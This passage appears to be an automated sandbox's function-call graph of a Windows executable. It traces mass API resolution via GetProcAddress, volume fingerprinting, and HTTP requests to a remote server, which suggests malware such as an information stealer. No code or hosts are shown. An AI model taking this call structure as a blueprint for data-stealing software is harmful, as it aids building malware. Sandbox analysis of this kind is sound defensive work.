9445c0 2 API calls 13940->13941 13942 9432d0 13941->13942 13943 9445c0 2 API calls 13942->13943 13944 9432e9 13943->13944 13945 9445c0 2 API calls 13944->13945 13946 943302 13945->13946 13947 9445c0 2 API calls 13946->13947 13948 94331b 13947->13948 13949 9445c0 2 API calls 13948->13949 13950 943334 13949->13950 13951 9445c0 2 API calls 13950->13951 13952 94334d 13951->13952 13953 9445c0 2 API calls 13952->13953 13954 943366 13953->13954 13955 9445c0 2 API calls 13954->13955 13956 94337f 13955->13956 13957 9445c0 2 API calls 13956->13957 13958 943398 13957->13958 13959 9445c0 2 API calls 13958->13959 13960 9433b1 13959->13960 13961 9445c0 2 API calls 13960->13961 13962 9433ca 13961->13962 13963 9445c0 2 API calls 13962->13963 13964 9433e3 13963->13964 13965 9445c0 2 API calls 13964->13965 13966 9433fc 13965->13966 13967 9445c0 2 API calls 13966->13967 13968 943415 13967->13968 13969 9445c0 2 API calls 13968->13969 13970 94342e 13969->13970 13971 9445c0 2 API calls 13970->13971 13972 943447 13971->13972 13973 9445c0 2 API calls 13972->13973 13974 943460 13973->13974 13975 9445c0 2 API calls 13974->13975 13976 943479 13975->13976 13977 9445c0 2 API calls 13976->13977 13978 943492 13977->13978 13979 9445c0 2 API calls 13978->13979 13980 9434ab 13979->13980 13981 9445c0 2 API calls 13980->13981 13982 9434c4 13981->13982 13983 9445c0 2 API calls 13982->13983 13984 9434dd 13983->13984 13985 9445c0 2 API calls 13984->13985 13986 9434f6 13985->13986 13987 9445c0 2 API calls 13986->13987 13988 94350f 13987->13988 13989 9445c0 2 API calls 13988->13989 13990 943528 13989->13990 13991 9445c0 2 API calls 13990->13991 13992 943541 13991->13992 13993 9445c0 2 API calls 13992->13993 13994 94355a 13993->13994 13995 9445c0 2 API calls 13994->13995 13996 943573 13995->13996 13997 9445c0 2 API calls 13996->13997 13998 94358c 13997->13998 13999 9445c0 2 API calls 13998->13999 14000 9435a5 13999->14000 14001 9445c0 2 API calls 14000->14001 14002 9435be 14001->14002 14003 9445c0 2 API calls 14002->14003 14004 9435d7 14003->14004 14005 9445c0 2 API calls 14004->14005 14006 9435f0 14005->14006 14007 9445c0 2 API calls 14006->14007 14008 943609 14007->14008 14009 9445c0 2 API calls 14008->14009 14010 943622 14009->14010 14011 9445c0 2 API calls 14010->14011 14012 94363b 14011->14012 14013 9445c0 2 API calls 14012->14013 14014 943654 14013->14014 14015 9445c0 2 API calls 14014->14015 14016 94366d 14015->14016 14017 9445c0 2 API calls 14016->14017 14018 943686 14017->14018 14019 9445c0 2 API calls 14018->14019 14020 94369f 14019->14020 14021 9445c0 2 API calls 14020->14021 14022 9436b8 14021->14022 14023 9445c0 2 API calls 14022->14023 14024 9436d1 14023->14024 14025 9445c0 2 API calls 14024->14025 14026 9436ea 14025->14026 14027 9445c0 2 API calls 14026->14027 14028 943703 14027->14028 14029 9445c0 2 API calls 14028->14029 14030 94371c 14029->14030 14031 9445c0 2 API calls 14030->14031 14032 943735 14031->14032 14033 9445c0 2 API calls 14032->14033 14034 94374e 14033->14034 14035 9445c0 2 API calls 14034->14035 14036 943767 14035->14036 14037 9445c0 2 API calls 14036->14037 14038 943780 14037->14038 14039 9445c0 2 API calls 14038->14039 14040 943799 14039->14040 14041 9445c0 2 API calls 14040->14041 14042 9437b2 14041->14042 14043 9445c0 2 API calls 14042->14043 14044 9437cb 14043->14044 14045 9445c0 2 API calls 14044->14045 14046 9437e4 14045->14046 14047 9445c0 2 API calls 14046->14047 14048 9437fd 14047->14048 14049 9445c0 2 API calls 14048->14049 14050 943816 14049->14050 14051 9445c0 2 API calls 14050->14051 14052 94382f 14051->14052 14053 9445c0 2 API calls 14052->14053 14054 943848 14053->14054 14055 9445c0 2 API calls 14054->14055 14056 943861 14055->14056 14057 9445c0 2 API calls 14056->14057 14058 94387a 14057->14058 14059 9445c0 2 API calls 14058->14059 14060 943893 14059->14060 14061 9445c0 2 API calls 14060->14061 14062 9438ac 14061->14062 14063 9445c0 2 API calls 14062->14063 14064 9438c5 14063->14064 14065 9445c0 2 API calls 14064->14065 14066 9438de 14065->14066 14067 9445c0 2 API calls 14066->14067 14068 9438f7 14067->14068 14069 9445c0 2 API calls 14068->14069 14070 943910 14069->14070 14071 9445c0 2 API calls 14070->14071 14072 943929 14071->14072 14073 9445c0 2 API calls 14072->14073 14074 943942 14073->14074 14075 9445c0 2 API calls 14074->14075 14076 94395b 14075->14076 14077 9445c0 2 API calls 14076->14077 14078 943974 14077->14078 14079 9445c0 2 API calls 14078->14079 14080 94398d 14079->14080 14081 9445c0 2 API calls 14080->14081 14082 9439a6 14081->14082 14083 9445c0 2 API calls 14082->14083 14084 9439bf 14083->14084 14085 9445c0 2 API calls 14084->14085 14086 9439d8 14085->14086 14087 9445c0 2 API calls 14086->14087 14088 9439f1 14087->14088 14089 9445c0 2 API calls 14088->14089 14090 943a0a 14089->14090 14091 9445c0 2 API calls 14090->14091 14092 943a23 14091->14092 14093 9445c0 2 API calls 14092->14093 14094 943a3c 14093->14094 14095 9445c0 2 API calls 14094->14095 14096 943a55 14095->14096 14097 9445c0 2 API calls 14096->14097 14098 943a6e 14097->14098 14099 9445c0 2 API calls 14098->14099 14100 943a87 14099->14100 14101 9445c0 2 API calls 14100->14101 14102 943aa0 14101->14102 14103 9445c0 2 API calls 14102->14103 14104 943ab9 14103->14104 14105 9445c0 2 API calls 14104->14105 14106 943ad2 14105->14106 14107 9445c0 2 API calls 14106->14107 14108 943aeb 14107->14108 14109 9445c0 2 API calls 14108->14109 14110 943b04 14109->14110 14111 9445c0 2 API calls 14110->14111 14112 943b1d 14111->14112 14113 9445c0 2 API calls 14112->14113 14114 943b36 14113->14114 14115 9445c0 2 API calls 14114->14115 14116 943b4f 14115->14116 14117 9445c0 2 API calls 14116->14117 14118 943b68 14117->14118 14119 9445c0 2 API calls 14118->14119 14120 943b81 14119->14120 14121 9445c0 2 API calls 14120->14121 14122 943b9a 14121->14122 14123 9445c0 2 API calls 14122->14123 14124 943bb3 14123->14124 14125 9445c0 2 API calls 14124->14125 14126 943bcc 14125->14126 14127 9445c0 2 API calls 14126->14127 14128 943be5 14127->14128 14129 9445c0 2 API calls 14128->14129 14130 943bfe 14129->14130 14131 9445c0 2 API calls 14130->14131 14132 943c17 14131->14132 14133 9445c0 2 API calls 14132->14133 14134 943c30 14133->14134 14135 9445c0 2 API calls 14134->14135 14136 943c49 14135->14136 14137 9445c0 2 API calls 14136->14137 14138 943c62 14137->14138 14139 9445c0 2 API calls 14138->14139 14140 943c7b 14139->14140 14141 9445c0 2 API calls 14140->14141 14142 943c94 14141->14142 14143 9445c0 2 API calls 14142->14143 14144 943cad 14143->14144 14145 9445c0 2 API calls 14144->14145 14146 943cc6 14145->14146 14147 9445c0 2 API calls 14146->14147 14148 943cdf 14147->14148 14149 9445c0 2 API calls 14148->14149 14150 943cf8 14149->14150 14151 9445c0 2 API calls 14150->14151 14152 943d11 14151->14152 14153 9445c0 2 API calls 14152->14153 14154 943d2a 14153->14154 14155 9445c0 2 API calls 14154->14155 14156 943d43 14155->14156 14157 9445c0 2 API calls 14156->14157 14158 943d5c 14157->14158 14159 9445c0 2 API calls 14158->14159 14160 943d75 14159->14160 14161 9445c0 2 API calls 14160->14161 14162 943d8e 14161->14162 14163 9445c0 2 API calls 14162->14163 14164 943da7 14163->14164 14165 9445c0 2 API calls 14164->14165 14166 943dc0 14165->14166 14167 9445c0 2 API calls 14166->14167 14168 943dd9 14167->14168 14169 9445c0 2 API calls 14168->14169 14170 943df2 14169->14170 14171 9445c0 2 API calls 14170->14171 14172 943e0b 14171->14172 14173 9445c0 2 API calls 14172->14173 14174 943e24 14173->14174 14175 9445c0 2 API calls 14174->14175 14176 943e3d 14175->14176 14177 9445c0 2 API calls 14176->14177 14178 943e56 14177->14178 14179 9445c0 2 API calls 14178->14179 14180 943e6f 14179->14180 14181 9445c0 2 API calls 14180->14181 14182 943e88 14181->14182 14183 9445c0 2 API calls 14182->14183 14184 943ea1 14183->14184 14185 9445c0 2 API calls 14184->14185 14186 943eba 14185->14186 14187 9445c0 2 API calls 14186->14187 14188 943ed3 14187->14188 14189 9445c0 2 API calls 14188->14189 14190 943eec 14189->14190 14191 9445c0 2 API calls 14190->14191 14192 943f05 14191->14192 14193 9445c0 2 API calls 14192->14193 14194 943f1e 14193->14194 14195 9445c0 2 API calls 14194->14195 14196 943f37 14195->14196 14197 9445c0 2 API calls 14196->14197 14198 943f50 14197->14198 14199 9445c0 2 API calls 14198->14199 14200 943f69 14199->14200 14201 9445c0 2 API calls 14200->14201 14202 943f82 14201->14202 14203 9445c0 2 API calls 14202->14203 14204 943f9b 14203->14204 14205 9445c0 2 API calls 14204->14205 14206 943fb4 14205->14206 14207 9445c0 2 API calls 14206->14207 14208 943fcd 14207->14208 14209 9445c0 2 API calls 14208->14209 14210 943fe6 14209->14210 14211 9445c0 2 API calls 14210->14211 14212 943fff 14211->14212 14213 9445c0 2 API calls 14212->14213 14214 944018 14213->14214 14215 9445c0 2 API calls 14214->14215 14216 944031 14215->14216 14217 9445c0 2 API calls 14216->14217 14218 94404a 14217->14218 14219 9445c0 2 API calls 14218->14219 14220 944063 14219->14220 14221 9445c0 2 API calls 14220->14221 14222 94407c 14221->14222 14223 9445c0 2 API calls 14222->14223 14224 944095 14223->14224 14225 9445c0 2 API calls 14224->14225 14226 9440ae 14225->14226 14227 9445c0 2 API calls 14226->14227 14228 9440c7 14227->14228 14229 9445c0 2 API calls 14228->14229 14230 9440e0 14229->14230 14231 9445c0 2 API calls 14230->14231 14232 9440f9 14231->14232 14233 9445c0 2 API calls 14232->14233 14234 944112 14233->14234 14235 9445c0 2 API calls 14234->14235 14236 94412b 14235->14236 14237 9445c0 2 API calls 14236->14237 14238 944144 14237->14238 14239 9445c0 2 API calls 14238->14239 14240 94415d 14239->14240 14241 9445c0 2 API calls 14240->14241 14242 944176 14241->14242 14243 9445c0 2 API calls 14242->14243 14244 94418f 14243->14244 14245 9445c0 2 API calls 14244->14245 14246 9441a8 14245->14246 14247 9445c0 2 API calls 14246->14247 14248 9441c1 14247->14248 14249 9445c0 2 API calls 14248->14249 14250 9441da 14249->14250 14251 9445c0 2 API calls 14250->14251 14252 9441f3 14251->14252 14253 9445c0 2 API calls 14252->14253 14254 94420c 14253->14254 14255 9445c0 2 API calls 14254->14255 14256 944225 14255->14256 14257 9445c0 2 API calls 14256->14257 14258 94423e 14257->14258 14259 9445c0 2 API calls 14258->14259 14260 944257 14259->14260 14261 9445c0 2 API calls 14260->14261 14262 944270 14261->14262 14263 9445c0 2 API calls 14262->14263 14264 944289 14263->14264 14265 9445c0 2 API calls 14264->14265 14266 9442a2 14265->14266 14267 9445c0 2 API calls 14266->14267 14268 9442bb 14267->14268 14269 9445c0 2 API calls 14268->14269 14270 9442d4 14269->14270 14271 9445c0 2 API calls 14270->14271 14272 9442ed 14271->14272 14273 9445c0 2 API calls 14272->14273 14274 944306 14273->14274 14275 9445c0 2 API calls 14274->14275 14276 94431f 14275->14276 14277 9445c0 2 API calls 14276->14277 14278 944338 14277->14278 14279 9445c0 2 API calls 14278->14279 14280 944351 14279->14280 14281 9445c0 2 API calls 14280->14281 14282 94436a 14281->14282 14283 9445c0 2 API calls 14282->14283 14284 944383 14283->14284 14285 9445c0 2 API calls 14284->14285 14286 94439c 14285->14286 14287 9445c0 2 API calls 14286->14287 14288 9443b5 14287->14288 14289 9445c0 2 API calls 14288->14289 14290 9443ce 14289->14290 14291 9445c0 2 API calls 14290->14291 14292 9443e7 14291->14292 14293 9445c0 2 API calls 14292->14293 14294 944400 14293->14294 14295 9445c0 2 API calls 14294->14295 14296 944419 14295->14296 14297 9445c0 2 API calls 14296->14297 14298 944432 14297->14298 14299 9445c0 2 API calls 14298->14299 14300 94444b 14299->14300 14301 9445c0 2 API calls 14300->14301 14302 944464 14301->14302 14303 9445c0 2 API calls 14302->14303 14304 94447d 14303->14304 14305 9445c0 2 API calls 14304->14305 14306 944496 14305->14306 14307 9445c0 2 API calls 14306->14307 14308 9444af 14307->14308 14309 9445c0 2 API calls 14308->14309 14310 9444c8 14309->14310 14311 9445c0 2 API calls 14310->14311 14312 9444e1 14311->14312 14313 9445c0 2 API calls 14312->14313 14314 9444fa 14313->14314 14315 9445c0 2 API calls 14314->14315 14316 944513 14315->14316 14317 9445c0 2 API calls 14316->14317 14318 94452c 14317->14318 14319 9445c0 2 API calls 14318->14319 14320 944545 14319->14320 14321 9445c0 2 API calls 14320->14321 14322 94455e 14321->14322 14323 9445c0 2 API calls 14322->14323 14324 944577 14323->14324 14325 9445c0 2 API calls 14324->14325 14326 944590 14325->14326 14327 9445c0 2 API calls 14326->14327 14328 9445a9 14327->14328 14329 959c10 14328->14329 14330 95a036 8 API calls 14329->14330 14331 959c20 43 API calls 14329->14331 14332 95a146 14330->14332 14333 95a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14330->14333 14331->14330 14334 95a216 14332->14334 14335 95a153 8 API calls 14332->14335 14333->14332 14336 95a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14334->14336 14337 95a298 14334->14337 14335->14334 14336->14337 14338 95a2a5 6 API calls 14337->14338 14339 95a337 14337->14339 14338->14339 14340 95a344 9 API calls 14339->14340 14341 95a41f 14339->14341 14340->14341 14342 95a4a2 14341->14342 14343 95a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14341->14343 14344 95a4dc 14342->14344 14345 95a4ab GetProcAddress GetProcAddress 14342->14345 14343->14342 14346 95a515 14344->14346 14347 95a4e5 GetProcAddress GetProcAddress 14344->14347 14345->14344 14348 95a612 14346->14348 14349 95a522 10 API calls 14346->14349 14347->14346 14350 95a67d 14348->14350 14351 95a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14348->14351 14349->14348 14352 95a686 GetProcAddress 14350->14352 14353 95a69e 14350->14353 14351->14350 14352->14353 14354 95a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14353->14354 14355 955ca3 14353->14355 14354->14355 14356 941590 14355->14356 15477 941670 14356->15477 14359 95a7a0 lstrcpy 14360 9415b5 14359->14360 14361 95a7a0 lstrcpy 14360->14361 14362 9415c7 14361->14362 14363 95a7a0 lstrcpy 14362->14363 14364 9415d9 14363->14364 14365 95a7a0 lstrcpy 14364->14365 14366 941663 14365->14366 14367 955510 14366->14367 14368 955521 14367->14368 14369 95a820 2 API calls 14368->14369 14370 95552e 14369->14370 14371 95a820 2 API calls 14370->14371 14372 95553b 14371->14372 14373 95a820 2 API calls 14372->14373 14374 955548 14373->14374 14375 95a740 lstrcpy 14374->14375 14376 955555 14375->14376 14377 95a740 lstrcpy 14376->14377 14378 955562 14377->14378 14379 95a740 lstrcpy 14378->14379 14380 95556f 14379->14380 14381 95a740 lstrcpy 14380->14381 14392 95557c 14381->14392 14382 95a740 lstrcpy 14382->14392 14383 955643 StrCmpCA 14383->14392 14384 9556a0 StrCmpCA 14385 9557dc 14384->14385 14384->14392 14386 95a8a0 lstrcpy 14385->14386 14387 9557e8 14386->14387 14388 95a820 2 API calls 14387->14388 14390 9557f6 14388->14390 14389 95a820 lstrlen lstrcpy 14389->14392 14393 95a820 2 API calls 14390->14393 14391 955856 StrCmpCA 14391->14392 14394 955991 14391->14394 14392->14382 14392->14383 14392->14384 14392->14389 14392->14391 14395 95a7a0 lstrcpy 14392->14395 14400 941590 lstrcpy 14392->14400 14403 955a0b StrCmpCA 14392->14403 14404 9552c0 25 API calls 14392->14404 14413 9551f0 20 API calls 14392->14413 14417 95a8a0 lstrcpy 14392->14417 14418 95578a StrCmpCA 14392->14418 14420 95593f StrCmpCA 14392->14420 14397 955805 14393->14397 14396 95a8a0 lstrcpy 14394->14396 14395->14392 14398 95599d 14396->14398 14399 941670 lstrcpy 14397->14399 14401 95a820 2 API calls 14398->14401 14421 955811 14399->14421 14400->14392 14402 9559ab 14401->14402 14405 95a820 2 API calls 14402->14405 14406 955a16 Sleep 14403->14406 14407 955a28 14403->14407 14404->14392 14408 9559ba 14405->14408 14406->14392 14409 95a8a0 lstrcpy 14407->14409 14410 941670 lstrcpy 14408->14410 14411 955a34 14409->14411 14410->14421 14412 95a820 2 API calls 14411->14412 14414 955a43 14412->14414 14413->14392 14415 95a820 2 API calls 14414->14415 14416 955a52 14415->14416 14419 941670 lstrcpy 14416->14419 14417->14392 14418->14392 14419->14421 14420->14392 14421->13474 14423 957553 GetVolumeInformationA 14422->14423 14424 95754c 14422->14424 14425 957591 14423->14425 14424->14423 14426 9575fc GetProcessHeap RtlAllocateHeap 14425->14426 14427 957619 14426->14427 14428 957628 wsprintfA 14426->14428 14429 95a740 lstrcpy 14427->14429 14430 95a740 lstrcpy 14428->14430 14431 955da7 14429->14431 14430->14431 14431->13495 14433 95a7a0 lstrcpy 14432->14433 14434 944899 14433->14434 15486 9447b0 14434->15486 14436 9448a5 14437 95a740 lstrcpy 14436->14437 14438 9448d7 14437->14438 14439 95a740 lstrcpy 14438->14439 14440 9448e4 14439->14440 14441 95a740 lstrcpy 14440->14441 14442 9448f1 14441->14442 14443 95a740 lstrcpy 14442->14443 14444 9448fe 14443->14444 14445 95a740 lstrcpy 14444->14445 14446 94490b InternetOpenA StrCmpCA 14445->14446 14447 944944 14446->14447 14448 944ecb InternetCloseHandle 14447->14448 15492 958b60 14447->15492 14450 944ee8 14448->14450 15507 949ac0 CryptStringToBinaryA 14450->15507 14451 944963 15500 95a920 14451->15500 14454 944976 14456 95a8a0 lstrcpy 14454->14456 14462 94497f 14456->14462 14457 95a820 2 API calls 14458 944f05 14457->14458 14460 95a9b0 4 API calls 14458->14460 14459 944f27 ctype 14464 95a7a0 lstrcpy 14459->14464 14461 944f1b 14460->14461 14463 95a8a0 lstrcpy 14461->14463 14465 95a9b0 4 API calls 14462->14465 14463->14459 14476 944f57 14464->14476 14466 9449a9 14465->14466 14467 95a8a0 lstrcpy 14466->14467 14468 9449b2 14467->14468 14469 95a9b0 4 API calls 14468->14469 14470 9449d1 14469->14470 14471 95a8a0 lstrcpy 14470->14471 14472 9449da 14471->14472 14473 95a920 3 API calls 14472->14473 14474 9449f8 14473->14474 14475 95a8a0 lstrcpy 14474->14475 14477 944a01 14475->14477 14476->13498 14478 95a9b0 4 API calls 14477->14478 14479 944a20 14478->14479 14480 95a8a0 lstrcpy 14479->14480 14481 944a29 14480->14481 14482 95a9b0 4 API calls 14481->14482 14483 944a48 14482->14483 14484 95a8a0 lstrcpy 14483->14484 14485 944a51 14484->14485 14486 95a9b0 4 API calls 14485->14486 14487 944a7d 14486->14487 14488 95a920 3 API calls 14487->14488 14489 944a84 14488->14489 14490 95a8a0 lstrcpy 14489->14490 14491 944a8d 14490->14491 14492 944aa3 InternetConnectA 14491->14492 14492->14448 14493 944ad3 HttpOpenRequestA 14492->14493 14495 944ebe InternetCloseHandle 14493->14495 14496 944b28 14493->14496 14495->14448 14497 95a9b0 4 API calls 14496->14497 14498 944b3c 14497->14498 14499 95a8a0 lstrcpy 14498->14499 14500 944b45 14499->14500 14501 95a920 3 API calls 14500->14501 14502 944b63 14501->14502 14503 95a8a0 lstrcpy 14502->14503 14504 944b6c 14503->14504 14505 95a9b0 4 API calls 14504->14505 14506 944b8b 14505->14506 14507 95a8a0 lstrcpy 14506->14507 14508 944b94 14507->14508 14509 95a9b0 4 API calls 14508->14509 14510 944bb5 14509->14510 14511 95a8a0 lstrcpy 14510->14511 14512 944bbe 14511->14512 14513 95a9b0 4 API calls 14512->14513 14514 944bde 14513->14514 14515 95a8a0 lstrcpy 14514->14515 14516 944be7 14515->14516 14517 95a9b0 4 API calls 14516->14517 14518 944c06 14517->14518 14519 95a8a0 lstrcpy 14518->14519 14520 944c0f 14519->14520 14521 95a920 3 API calls 14520->14521 14522 944c2d 14521->14522 14523 95a8a0 lstrcpy 14522->14523 14524 944c36 14523->14524 14525 95a9b0 4 API calls 14524->14525 14526 944c55 14525->14526 14527 95a8a0 lstrcpy 14526->14527 14528 944c5e 14527->14528 14529 95a9b0 4 API calls 14528->14529 14530 944c7d 14529->14530 14531 95a8a0 lstrcpy 14530->14531 14532 944c86 14531->14532 14533 95a920 3 API calls 14532->14533 14534 944ca4 14533->14534 14535 95a8a0 lstrcpy 14534->14535 14536 944cad 14535->14536 14537 95a9b0 4 API calls 14536->14537 14538 944ccc 14537->14538 14539 95a8a0 lstrcpy 14538->14539 14540 944cd5 14539->14540 14541 95a9b0 4 API calls 14540->14541 14542 944cf6 14541->14542 14543 95a8a0 lstrcpy 14542->14543 14544 944cff 14543->14544 14545 95a9b0 4 API calls 14544->14545 14546 944d1f 14545->14546 14547 95a8a0 lstrcpy 14546->14547 14548 944d28 14547->14548 14549 95a9b0 4 API calls 14548->14549 14550 944d47 14549->14550 14551 95a8a0 lstrcpy 14550->14551 14552 944d50 14551->14552 14553 95a920 3 API calls 14552->14553 14554 944d6e 14553->14554 14555 95a8a0 lstrcpy 14554->14555 14556 944d77 14555->14556 14557 95a740 lstrcpy 14556->14557 14558 944d92 14557->14558 14559 95a920 3 API calls 14558->14559 14560 944db3 14559->14560 14561 95a920 3 API calls 14560->14561 14562 944dba 14561->14562 14563 95a8a0 lstrcpy 14562->14563 14564 944dc6 14563->14564 14565 944de7 lstrlen 14564->14565 14566 944dfa 14565->14566 14567 944e03 lstrlen 14566->14567 15506 95aad0 14567->15506 14569 944e13 HttpSendRequestA 14570 944e32 InternetReadFile 14569->14570 14571 944e67 InternetCloseHandle 14570->14571 14576 944e5e 14570->14576 14573 95a800 14571->14573 14573->14495 14574 95a9b0 4 API calls 14574->14576 14575 95a8a0 lstrcpy 14575->14576 14576->14570 14576->14571 14576->14574 14576->14575 15513 95aad0 14577->15513 14579 9517c4 StrCmpCA 14580 9517cf ExitProcess 14579->14580 14582 9517d7 14579->14582 14581 9519c2 14581->13500 14582->14581 14583 9518f1 StrCmpCA 14582->14583 14584 951951 StrCmpCA 14582->14584 14585 951970 StrCmpCA 14582->14585 14586 951913 StrCmpCA 14582->14586 14587 951932 StrCmpCA 14582->14587 14588 95185d StrCmpCA 14582->14588 14589 95187f StrCmpCA 14582->14589 14590 9518ad StrCmpCA 14582->14590 14591 9518cf StrCmpCA 14582->14591 14592 95a820 lstrlen lstrcpy 14582->14592 14583->14582 14584->14582 14585->14582 14586->14582 14587->14582 14588->14582 14589->14582 14590->14582 14591->14582 14592->14582 14594 95a7a0 lstrcpy 14593->14594 14595 945979 14594->14595 14596 9447b0 2 API calls 14595->14596 14597 945985 14596->14597 14598 95a740 lstrcpy 14597->14598 14599 9459ba 14598->14599 14600 95a740 lstrcpy 14599->14600 14601 9459c7 14600->14601 14602 95a740 lstrcpy 14601->14602 14603 9459d4 14602->14603 14604 95a740 lstrcpy 14603->14604 14605 9459e1 14604->14605 14606 95a740 lstrcpy 14605->14606 14607 9459ee InternetOpenA StrCmpCA 14606->14607 14608 945a1d 14607->14608 14609 945fc3 InternetCloseHandle 14608->14609 14610 958b60 3 API calls 14608->14610 14611 945fe0 14609->14611 14612 945a3c 14610->14612 14613 949ac0 4 API calls 14611->14613 14614 95a920 3 API calls 14612->14614 14615 945fe6 14613->14615 14616 945a4f 14614->14616 14618 95a820 2 API calls 14615->14618 14621 94601f ctype 14615->14621 14617 95a8a0 lstrcpy 14616->14617 14622 945a58 14617->14622 14619 945ffd 14618->14619 14620 95a9b0 4 API calls 14619->14620 14623 946013 14620->14623 14624 95a7a0 lstrcpy 14621->14624 14626 95a9b0 4 API calls 14622->14626 14625 95a8a0 lstrcpy 14623->14625 14635 94604f 14624->14635 14625->14621 14627 945a82 14626->14627 14628 95a8a0 lstrcpy 14627->14628 14629 945a8b 14628->14629 14630 95a9b0 4 API calls 14629->14630 14631 945aaa 14630->14631 14632 95a8a0 lstrcpy 14631->14632 14633 945ab3 14632->14633 14634 95a920 3 API calls 14633->14634 14636 945ad1 14634->14636 14635->13506 14637 95a8a0 lstrcpy 14636->14637 14638 945ada 14637->14638 14639 95a9b0 4 API calls 14638->14639 14640 945af9 14639->14640 14641 95a8a0 lstrcpy 14640->14641 14642 945b02 14641->14642 14643 95a9b0 4 API calls 14642->14643 14644 945b21 14643->14644 14645 95a8a0 lstrcpy 14644->14645 14646 945b2a 14645->14646 14647 95a9b0 4 API calls 14646->14647 14648 945b56 14647->14648 14649 95a920 3 API calls 14648->14649 14650 945b5d 14649->14650 14651 95a8a0 lstrcpy 14650->14651 14652 945b66 14651->14652 14653 945b7c InternetConnectA 14652->14653 14653->14609 14654 945bac HttpOpenRequestA 14653->14654 14656 945fb6 InternetCloseHandle 14654->14656 14657 945c0b 14654->14657 14656->14609 14658 95a9b0 4 API calls 14657->14658 14659 945c1f 14658->14659 14660 95a8a0 lstrcpy 14659->14660 14661 945c28 14660->14661 14662 95a920 3 API calls 14661->14662 14663 945c46 14662->14663 14664 95a8a0 lstrcpy 14663->14664 14665 945c4f 14664->14665 14666 95a9b0 4 API calls 14665->14666 14667 945c6e 14666->14667 14668 95a8a0 lstrcpy 14667->14668 14669 945c77 14668->14669 14670 95a9b0 4 API calls 14669->14670 14671 945c98 14670->14671 14672 95a8a0 lstrcpy 14671->14672 14673 945ca1 14672->14673 14674 95a9b0 4 API calls 14673->14674 14675 945cc1 14674->14675 14676 95a8a0 lstrcpy 14675->14676 14677 945cca 14676->14677 14678 95a9b0 4 API calls 14677->14678 14679 945ce9 14678->14679 14680 95a8a0 lstrcpy 14679->14680 14681 945cf2 14680->14681 14682 95a920 3 API calls 14681->14682 14683 945d10 14682->14683 14684 95a8a0 lstrcpy 14683->14684 14685 945d19 14684->14685 14686 95a9b0 4 API calls 14685->14686 14687 945d38 14686->14687 14688 95a8a0 lstrcpy 14687->14688 14689 945d41 14688->14689 14690 95a9b0 4 API calls 14689->14690 14691 945d60 14690->14691 14692 95a8a0 lstrcpy 14691->14692 14693 945d69 14692->14693 14694 95a920 3 API calls 14693->14694 14695 945d87 14694->14695 14696 95a8a0 lstrcpy 14695->14696 14697 945d90 14696->14697 14698 95a9b0 4 API calls 14697->14698 14699 945daf 14698->14699 14700 95a8a0 lstrcpy 14699->14700 14701 945db8 14700->14701 14702 95a9b0 4 API calls 14701->14702 14703 945dd9 14702->14703 14704 95a8a0 lstrcpy 14703->14704 14705 945de2 14704->14705 14706 95a9b0 4 API calls 14705->14706 14707 945e02 14706->14707 14708 95a8a0 lstrcpy 14707->14708 14709 945e0b 14708->14709 14710 95a9b0 4 API calls 14709->14710 14711 945e2a 14710->14711 14712 95a8a0 lstrcpy 14711->14712 14713 945e33 14712->14713 14714 95a920 3 API calls 14713->14714 14715 945e54 14714->14715 14716 95a8a0 lstrcpy 14715->14716 14717 945e5d 14716->14717 14718 945e70 lstrlen 14717->14718 15514 95aad0 14718->15514 14720 945e81 lstrlen GetProcessHeap RtlAllocateHeap 15515 95aad0 14720->15515 14722 945eae lstrlen 14723 945ebe 14722->14723 14724 945ed7 lstrlen 14723->14724 14725 945ee7 14724->14725 14726 945ef0 lstrlen 14725->14726 14727 945f04 14726->14727 14728 945f1a lstrlen 14727->14728 15516 95aad0 14728->15516 14730 945f2a HttpSendRequestA 14731 945f35 InternetReadFile 14730->14731 14732 945f6a InternetCloseHandle 14731->14732 14736 945f61 14731->14736 14732->14656 14734 95a9b0 4 API calls 14734->14736 14735 95a8a0 lstrcpy 14735->14736 14736->14731 14736->14732 14736->14734 14736->14735 14738 951077 14737->14738 14739 951151 14738->14739 14740 95a820 lstrlen lstrcpy 14738->14740 14739->13508 14740->14738 14746 950db7 14741->14746 14742 950f17 14742->13516 14743 950ea4 StrCmpCA 14743->14746 14744 950e27 StrCmpCA 14744->14746 14745 950e67 StrCmpCA 14745->14746 14746->14742 14746->14743 14746->14744 14746->14745 14747 95a820 lstrlen lstrcpy 14746->14747 14747->14746 14751 950f67 14748->14751 14749 951044 14749->13524 14750 950fb2 StrCmpCA 14750->14751 14751->14749 14751->14750 14752 95a820 lstrlen lstrcpy 14751->14752 14752->14751 14754 95a740 lstrcpy 14753->14754 14755 951a26 14754->14755 14756 95a9b0 4 API calls 14755->14756 14757 951a37 14756->14757 14758 95a8a0 lstrcpy 14757->14758 14759 951a40 14758->14759 14760 95a9b0 4 API calls 14759->14760 14761 951a5b 14760->14761 14762 95a8a0 lstrcpy 14761->14762 14763 951a64 14762->14763 14764 95a9b0 4 API calls 14763->14764 14765 951a7d 14764->14765 14766 95a8a0 lstrcpy 14765->14766 14767 951a86 14766->14767 14768 95a9b0 4 API calls 14767->14768 14769 951aa1 14768->14769 14770 95a8a0 lstrcpy 14769->14770 14771 951aaa 14770->14771 14772 95a9b0 4 API calls 14771->14772 14773 951ac3 14772->14773 14774 95a8a0 lstrcpy 14773->14774 14775 951acc 14774->14775 14776 95a9b0 4 API calls 14775->14776 14777 951ae7 14776->14777 14778 95a8a0 lstrcpy 14777->14778 14779 951af0 14778->14779 14780 95a9b0 4 API calls 14779->14780 14781 951b09 14780->14781 14782 95a8a0 lstrcpy 14781->14782 14783 951b12 14782->14783 14784 95a9b0 4 API calls 14783->14784 14785 951b2d 14784->14785 14786 95a8a0 lstrcpy 14785->14786 14787 951b36 14786->14787 14788 95a9b0 4 API calls 14787->14788 14789 951b4f 14788->14789 14790 95a8a0 lstrcpy 14789->14790 14791 951b58 14790->14791 14792 95a9b0 4 API calls 14791->14792 14793 951b76 14792->14793 14794 95a8a0 lstrcpy 14793->14794 14795 951b7f 14794->14795 14796 957500 6 API calls 14795->14796 14797 951b96 14796->14797 14798 95a920 3 API calls 14797->14798 14799 951ba9 14798->14799 14800 95a8a0 lstrcpy 14799->14800 14801 951bb2 14800->14801 14802 95a9b0 4 API calls 14801->14802 14803 951bdc 